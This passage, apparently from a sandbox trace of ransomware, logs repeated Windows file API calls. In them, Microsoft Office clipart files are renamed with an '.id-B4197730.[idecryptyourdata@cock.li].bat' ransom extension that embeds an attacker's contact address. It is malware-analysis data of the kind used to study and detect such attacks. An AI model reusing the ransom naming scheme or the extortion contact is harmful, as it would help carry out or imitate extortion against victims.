office\\root\\clipart\\pub60cor\\na01866_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.933] CloseHandle (hObject=0x378) returned 1 [0169.934] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.934] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02009_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.934] CloseHandle (hObject=0x378) returned 1 [0169.936] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.936] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02041_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.936] CloseHandle (hObject=0x378) returned 1 [0169.938] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.938] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02066_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.938] CloseHandle (hObject=0x378) returned 1 [0169.944] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.944] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02091_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.945] CloseHandle (hObject=0x378) returned 1 [0169.946] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.946] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02092_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.946] CloseHandle (hObject=0x378) returned 1 [0169.947] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.947] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02093_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.947] CloseHandle (hObject=0x378) returned 1 [0169.948] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.948] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02124_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.949] CloseHandle (hObject=0x378) returned 1 [0169.949] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.949] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02125_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.950] CloseHandle (hObject=0x378) returned 1 [0169.951] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.952] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02126_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.952] CloseHandle (hObject=0x378) returned 1 [0169.953] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.953] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02127_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.953] CloseHandle (hObject=0x378) returned 1 [0169.954] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.954] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02262_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.954] CloseHandle (hObject=0x378) returned 1 [0169.955] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.955] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02264_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.955] CloseHandle (hObject=0x378) returned 1 [0171.549] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.549] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02356_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.693] CloseHandle (hObject=0x414) returned 1 [0171.695] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.695] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00272_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.695] CloseHandle (hObject=0x414) returned 1 [0171.696] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.696] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00468_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.696] CloseHandle (hObject=0x414) returned 1 [0171.698] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.698] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00478_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.699] CloseHandle (hObject=0x414) returned 1 [0171.699] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.699] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00485_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.700] CloseHandle (hObject=0x414) returned 1 [0171.700] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.700] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00489_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.701] CloseHandle (hObject=0x414) returned 1 [0171.701] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.701] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00531_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.702] CloseHandle (hObject=0x414) returned 1 [0171.702] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.703] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00542_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.703] CloseHandle (hObject=0x414) returned 1 [0171.704] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.704] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00555_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00555_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.705] CloseHandle (hObject=0x414) returned 1 [0171.706] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.706] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00559_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00559_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.707] CloseHandle (hObject=0x414) returned 1 [0171.708] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.708] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00563_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00563_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.708] CloseHandle (hObject=0x414) returned 1 [0171.709] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.709] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00578_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00578_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.710] CloseHandle (hObject=0x414) returned 1 [0171.711] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.711] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00608_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00608_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.711] CloseHandle (hObject=0x414) returned 1 [0171.712] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.712] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00633_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00633_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.712] CloseHandle (hObject=0x414) returned 1 [0171.713] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.713] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00640_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00640_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.714] CloseHandle (hObject=0x414) returned 1 [0171.714] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.714] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00668_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.715] CloseHandle (hObject=0x414) returned 1 [0171.715] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.715] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00685_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.716] CloseHandle (hObject=0x414) returned 1 [0171.716] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.717] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00686_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.717] CloseHandle (hObject=0x414) returned 1 [0171.719] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.719] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00693_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.719] CloseHandle (hObject=0x414) returned 1 [0171.720] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.720] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00720_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), 